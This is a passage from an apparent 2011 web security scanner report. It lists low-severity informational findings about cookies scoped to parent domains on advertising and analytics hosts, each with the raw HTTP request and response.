Set-Cookie: aud=ABR4nGNgYGDwU32xg4GB0dBFVGAjgzUDg4ASAxj0gkmeyxDqJpjir2xgaGBgYF4D4VWBeaKJYJ5oAkTwL5jiMAJTYo%2FBFNcMsErxAjBP5BxEpRuY4guDqPwEpni%2FQXiVEDMPgfWJFUEc8R7M4%2F0D5rFKgSnBrxCVOyHamSG8XRCX7YFo74QI7ofwuiEqpSGCCyFG84EpgUKIcyGuFhMHaxC6BgkQiO1svGCOxH0IFQimJJ0glCPER6JgSnwfxMzjYEroGYQqhhi9BcIrgahUhXjMFOKjA5DAWgVxiz%2FEIi8gAQDkJzN5; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:36 GMT; Path=/
Set-Cookie: cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rc7%2Fm88kc3AwGjoIiqwESTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIBZPqLDEJScq%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAR%2FD6bmYFBacu%2B%2F4xAgbNAGiQp%2Bf8%2FUDWQoRR2JpsFKL63CaxbsoEBJM9oAaRB6r9A%2BIEqTsxwRYyWqJJae0xxS6ZVBYCMh3Cg1mIYH3amArcJMv%2BP4JM8TYzro3GbEHamAOZABpwO9N9VQNgarT0KuK0R%2FN7GDLcGXTJQJYaw8bJmFzlAiprBIakEpIGScJPA0Y%2BmCUgzcVycBuaDkwUjMJ0oAdly%2BuW4XRrAu49a9nh%2FKcGXbGRwSwYuYqaWI7T2SOC2R2F%2FMz4XihKOFq76Bmq51M36HHJWhdkLzrIgs%2F3z9%2BKVV9jfjtszbtZncUt6f0nHJ5mGW1LOcAtuSWE1S7wOzjk5ExgWpsA8xwiyJh%2BvYmE1PMVMUDUTruzFwKCY%2FJ1wPPrnryNcDijsf4OnJBHOwJPQNvATdoOb9UJ8EbgIt2Roz0x8Olfjc3Ulbkn%2F%2FKPEuHo7PhMO45aMZ9mNz2EFuCUTLc8RrlbkZ%2FARjtJAFSm8yS6eZQ%2FhIAhTrSSsKPW%2BLGE3K1zCE15eL64jm4DNGgYGrtZJ1CqQAlWU8BTRKsq4JRWX1REOEJn%2F%2B4mpvLXxxo%2FXixu4c77Xi1u4JZUFHPCl22d4MvP6%2F8Q43ABPs0iNiGaRwv5ruE3gq3hLrWj2z3%2BBJyZn3STsVwAGuycR; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:36 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 643
Connection: close

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div><!-- Begin comScore Tag --> <script>
...[SNIP]...

13.37. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=536088&ev=2814750682866683&rurl=http://matcher-cwb.bidder7.mookie1.com/do-association?return=ctxweb%26can=ffffffffffffffff HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|536088.2814750682866683.0|535461.4325897289836481830.0|538303.x.0; V=8vciuQJMXXJY; cwbh1=357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A1443%3B08%2F12%2F2011%3BNETM7%0A2996%3B08%2F11%2F2011%3BLOW21

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Cache-Control: no-cache, no-store
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Fri, 13-Jul-2012 18:37:29 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|536088.2814750682866683.0|535461.4325897289836481830.0|538303.x.0; Domain=.contextweb.com; Expires=Wed, 18-Jul-2012 18:37:29 GMT; Path=/
Location: http://matcher-cwb.bidder7.mookie1.com/do-association?return=ctxweb&can=ffffffffffffffff
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Tue, 19 Jul 2011 18:37:28 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"


13.38. http://bp.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?pixid=99062281 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bp.specificclick.net

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Set-Cookie: ug=rBXKI63Fi2POmD; Domain=.specificclick.net; Expires=Sun, 17-Jul-2016 21:00:37 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 255
Date: Tue, 19 Jul 2011 21:00:36 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://b.scorecardresearch.com/p?c1=8&amp;c2=2101&amp;c3=1234567891234567891&amp;c15
...[SNIP]...

13.39. http://c.atdmt.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074&RedC=c.bing.com&MXFR=E361C23374E642C998D8ABA7166A75EC HTTP/1.1
Host: c.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1305305557-4079447; MUID=E361C23374E642C998D8ABA7166A75EC; ach00=903d/120af:6cf8/2750d:d99f/1afe8:bab9/11176:ba67/1c4e:f594/1c01f:66c2/39a1:66c2/3877:66c2/2b295; ach01=ce81a74/120af/134f208a/903d/4dd2907e:cf0807d/2750d/135a6ad5/6cf8/4de0ff1b:8a892c1/1afe8/bfedd64/d99f/4de0ffc1:a34fe32/11176/ab3574a/bab9/4de6e487:224f750/1c4e/4919ce6/ba67/4de6e67b:421378c/1c01f/825b020/f594/4de7e7e5:421378c/1c01f/8b4ca16/f594/4de7e7e7:421378c/1c01f/88b46ce/f594/4de7ecb3:c62bb85/39a1/123ee4af/66c2/4dfffb75:c388719/39a1/1235b344/66c2/4e008e93:c3ee9ca/3877/123ee6eb/66c2/4e008f9b:d42f8c5/2b295/13d4144a/66c2/4e178c27

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.bing.com/c.gif?DI=15074&MUID=E361C23374E642C998D8ABA7166A75EC&cb=1cc461f8e7da070
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=E361C23374E642C998D8ABA7166A75EC; domain=.atdmt.com; expires=Sat, 04-Feb-2012 14:24:23 GMT; path=/;
Date: Tue, 19 Jul 2011 14:24:23 GMT
Content-Length: 0


13.40. http://c.bing.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.bing.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Host: c.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110514; _UR=OMW=1; s_nr=1306591010561; _msaId=d8678782_61_15534038; _FP=; _HOP=; MUID=E361C23374E642C998D8ABA7166A75EC; OrigMUID=E361C23374E642C998D8ABA7166A75EC%2c7f2206b9bd64464bac0097685f7b8444; _SS=SID=7E86734B014B497982A1A3998AE3B12B&CW=1065&CH=723; SRCHD=MS=1865664&SM=1&D=1769857&AF=BMMENO

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15074&RedC=c.bing.com&MXFR=E361C23374E642C998D8ABA7166A75EC
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=E361C23374E642C998D8ABA7166A75EC&TUID=1; domain=.bing.com; expires=Sat, 04-Feb-2012 14:24:20 GMT; path=/;
Date: Tue, 19 Jul 2011 14:24:20 GMT
Content-Length: 0


13.41. http://c.microsoft.com/trans_pixel.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.microsoft.com
Path:   /trans_pixel.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trans_pixel.asp?source=www&TYPE=PV&p=worldwide&URI=%2fworldwide%2fdefault.aspx&GUID=1F4FC18C-F71E-47FB-8FC9-612F8EE59C61&r=http%3a%2f%2fwww.microsoft.com%2fworldwide&lc=en-us HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/worldwide/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078488618:ss=1311077969178; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.NumberOfVisits=3&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=70&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MS0=e2380e0986da4be1b66f0ac9e9764ae5; domain=.microsoft.com; expires=Tue, 19-Jul-2011 15:58:34 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
Date: Tue, 19 Jul 2011 15:28:33 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

13.42. http://cdnt.meteorsolutions.com/api/setid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/setid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/setid?parent_fbid=&application_id=081c924b-ddfd-447a-8c7a-2db01211cae7&url_fbid=nSlUkQ8r7Lb HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; meteor_server_a71be9da-385a-45ab-b672-9d67c538b004=a71be9da-385a-45ab-b672-9d67c538b004%3C%3EB5nUnLnLLMn%3C%3E9uMSzSBW7pb%3C%3E%3C%3Ehttp%253A%2F%2Faz10143.vo.msecnd.net%2Fweb%2Foie9%2Findex_tyie9A.html%2523fbid%253D9uMSzSBW7pb%2526wom%253Dfalse; meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EnSlUkQ8r7Lb%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Tue, 19 Jul 2011 15:16:53 GMT
Content-Type: image/gif
Connection: close
P3P: CP="NID DSP ALL COR"
Etag: "2daeaa8b5f19f0bc209d976c02bd6acb51b00b0a"
Content-Length: 43
Set-Cookie: uid=0ad1f409-c147-4bb9-a425-2684ee1031f7; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:16:53 GMT; Path=/

GIF89a.............!.......,...........D..;

13.43. http://cdnt.meteorsolutions.com/api/track  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/track

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/track?application_id=081c924b-ddfd-447a-8c7a-2db01211cae7&url_fbid=nSlUkQ8r7Lb&parent_fbid=&referrer=&location=http%3A%2F%2Fwww.discoverbing.com%2F&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; meteor_server_a71be9da-385a-45ab-b672-9d67c538b004=a71be9da-385a-45ab-b672-9d67c538b004%3C%3EB5nUnLnLLMn%3C%3E9uMSzSBW7pb%3C%3E%3C%3Ehttp%253A%2F%2Faz10143.vo.msecnd.net%2Fweb%2Foie9%2Findex_tyie9A.html%2523fbid%253D9uMSzSBW7pb%2526wom%253Dfalse; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Tue, 19 Jul 2011 15:16:53 GMT
Content-Type: application/javascript
Connection: close
P3P: CP="NID DSP ALL COR"
Etag: "0ab6932a09770d21174fc4740c4ea6797459b1b2"
Content-Length: 133
Set-Cookie: meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EnSlUkQ8r7Lb%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:16:53 GMT; Path=/
Set-Cookie: uid=0ad1f409-c147-4bb9-a425-2684ee1031f7; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:16:53 GMT; Path=/

meteor.json_query_callback({"parent_id": "", "id": "nSlUkQ8r7Lb", "uid": "0ad1f409\\x2Dc147\\x2D4bb9\\x2Da425\\x2D2684ee1031f7"}, 0);

13.44. http://clk.atdmt.com/goiframe/213439054/340524297/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /goiframe/213439054/340524297/direct/01

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goiframe/213439054/340524297/direct/01 HTTP/1.1
Host: clk.atdmt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PVM/iview/340524297/direct/01?click=http://clk.specificclick.net/click/v=5;m=3;l=24555;c=159320;b=985192;ts=20110719164416;dct=
Cookie: AA002=1297100700-4279215; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; MUID=3957719BE8F34A5DA51D204E7E06704A; ach00=ceda/2b295:66c2/2b7b2; ach01=d61e38e/2b295/1397f116/ceda/4e1f7328:d550fc1/2b7b2/13ebac86/66c2/4e1f736e

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=ceda/2b295:66c2/2b7b2:8bff/2a019; expires=Thursday, 18-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=d61e38e/2b295/1397f116/ceda/4e1f7328:d550fc1/2b7b2/13ebac86/66c2/4e1f736e:cb8d24e/2a019/144bfd09/8bff/4e25ecbb; expires=Thursday, 18-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Tue, 19 Jul 2011 20:44:42 GMT
Connection: close


13.45. http://clk.specificclick.net/click/v=5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.specificclick.net
Path:   /click/v=5

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/v=5;m=3;l=24555;c=159320;b=985192;ts=20110719164416;dct=http://t.atdmt.com HTTP/1.1
Host: clk.specificclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PVM/iview/340524297/direct/01?click=http://clk.specificclick.net/click/v=5;m=3;l=24555;c=159320;b=985192;ts=20110719164416;dct=
Cookie: ug=WPTUOuwXp9NyRD

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Set-Cookie: ug=WPTUOuwXp9NyRD; Domain=.specificclick.net; Expires=Sun, 17-Jul-2016 20:44:45 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://t.atdmt.com
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 168
Date: Tue, 19 Jul 2011 20:44:45 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://t.atdmt.com">here</a>.<p>
</body>
</html>

13.46. http://d.agkn.com/pixel!t=650!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.agkn.com
Path:   /pixel!t=650!

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel!t=650!?ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&che=8001782&uuid=2473514405220909223&camid=5645623&plaid=65809089&creid=42836554&adgid=243054557 HTTP/1.1
Host: d.agkn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: uuid=636735553077172289; u=6|0BAgVsetHAAAQAAEBACcCAtPdQQLT2IEBAlB9AeUAAAAAA%2BwqvwAAAAACj9l3AAAAAA58t6QBagIABDCfAAQwtAA%3D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=636735553077172289; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 17-Jul-2016 20:44:49 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BAgVuKlBAAAgAAMBACcCAtPdRgLT2IYBAlB9AeUAAAAAA%2BwqwQAAAAACjaJKAAAAAA58t90BagIABDCfAAQwtAA%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 18-Jul-2013 20:44:49 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"43-1308732886000"
Last-Modified: Wed, 22 Jun 2011 08:54:46 GMT
Content-Type: image/gif
Content-Language: en-US
Content-Length: 43
Date: Tue, 19 Jul 2011 20:44:49 GMT
Connection: close

GIF89a.............!.......,...........D..;

13.47. http://ehg-aaa.hitbox.com/HG  previous  next

Summary

